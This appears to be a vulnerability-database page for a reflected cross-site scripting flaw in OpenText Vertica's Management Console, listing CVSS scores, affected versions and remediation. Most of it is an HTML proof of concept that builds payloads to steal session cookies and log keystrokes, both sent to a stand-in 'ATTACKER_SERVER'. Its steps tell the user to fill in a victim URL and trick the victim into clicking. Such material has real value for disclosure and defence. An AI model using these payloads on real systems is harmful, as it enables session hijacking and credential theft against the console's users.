Security Vulnerability Report
CVE-2025-12453 CVSS 6.1 MEDIUM

CVE-2025-12453

Published: 2026-03-13 19:53:47
Last Modified: 2026-04-17 15:25:00

Description

Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in OpenText™ Vertica allows Reflected XSS. The vulnerability could lead to a reflected cross-site scripting attack in the Vertica Management Console application. This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X, from 23.0 through 23.X, from 24.0 through 24.X, from 25.1.0 through 25.1.X, from 25.2.0 through 25.2.X, from 25.3.0 through 25.3.X.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector (v3.1, Primary)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Vector (v4.0, Secondary, base score 5.1 MEDIUM)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:X/U:X
Weakness
CWE-79

Configurations (Affected Products)

cpe:2.3:a:opentext:vertica:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.0.0-0 up to, but excluding, 25.4.0-0)
Vertica 10.0 - 10.X
Vertica 11.0 - 11.X
Vertica 12.0 - 12.X
Vertica 23.0 - 23.X
Vertica 24.0 - 24.X
Vertica 25.1.0 - 25.1.X
Vertica 25.2.0 - 25.2.X
Vertica 25.3.0 - 25.3.X

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-12453 Reflected XSS PoC for OpenText Vertica -->
<!-- This PoC demonstrates a reflected XSS attack in Vertica Management Console -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-12453 PoC</title>
</head>
<body>
  <h2>CVE-2025-12453 - OpenText Vertica Reflected XSS</h2>
  <p><strong>Affected Component:</strong> Vertica Management Console</p>
  <p><strong>Vulnerability:</strong> Reflected Cross-Site Scripting</p>
  <p><strong>CVSS Score:</strong> 6.1 (Medium)</p>

  <h3>Attack Scenarios:</h3>
  <h4>Scenario 1: Basic Script Injection</h4>
  <p>Malicious URL Pattern:</p>
  <pre id="url1"></pre>

  <h4>Scenario 2: Cookie Stealing</h4>
  <p>Malicious URL to steal session cookies:</p>
  <pre id="url2"></pre>
  <p>Attacker-controlled server to receive stolen cookies:</p>
  <pre>https://ATTACKER_SERVER/collect?cookie=</pre>

  <h4>Scenario 3: Keylogger Injection</h4>
  <p>Malicious URL to inject keylogger:</p>
  <pre id="url3"></pre>

  <h3>Usage Instructions:</h3>
  <ol>
    <li>Replace <code>VICTIM_VERTICA_URL</code> with the target Vertica Management Console URL</li>
    <li>Replace <code>VULNERABLE_PARAMETER</code> with the vulnerable parameter name</li>
    <li>Replace <code>ATTACKER_SERVER</code> with your controlled server</li>
    <li>Social engineer the victim to click the crafted URL</li>
  </ol>

  <script>
    // Base URL for Vertica Management Console
    const baseUrl = 'https://VICTIM_VERTICA_URL';
    // Example vulnerable parameter (actual parameter varies)
    const vulnParam = 'VULNERABLE_PARAMETER';
    // Attacker-controlled server referenced by the usage instructions above
    const attackerServer = 'https://ATTACKER_SERVER';

    // PoC payloads. A literal "</script>" inside a JS string is written as
    // "<\/script>" so the HTML parser does not end this script element early.
    const payloads = {
      basicXSS: '<script>alert("XSS")<\/script>',
      cookieTheft: '<img src=x onerror="fetch(\'' + attackerServer + '/collect?cookie=\'+document.cookie)">',
      keylogger: '<script>document.onkeypress=function(e){fetch(\'' + attackerServer + '/log?k=\'+e.key)}<\/script>'
    };

    // Display example URLs
    document.getElementById('url1').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.basicXSS);
    document.getElementById('url2').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.cookieTheft);
    document.getElementById('url3').textContent = baseUrl + '?' + vulnParam + '=' + encodeURIComponent(payloads.keylogger);

    // Log that the PoC page has loaded
    console.log('[CVE-2025-12453] PoC loaded');
  </script>

  <h3>Remediation:</h3>
  <ul>
    <li>Upgrade to Vertica version 25.4.0 or later</li>
    <li>Apply input validation and output encoding</li>
    <li>Implement Content-Security-Policy headers</li>
  </ul>
</body>
</html>

References

https://portal.microfocus.com/s/article/KM000045852?language=en_US (Vendor Advisory)
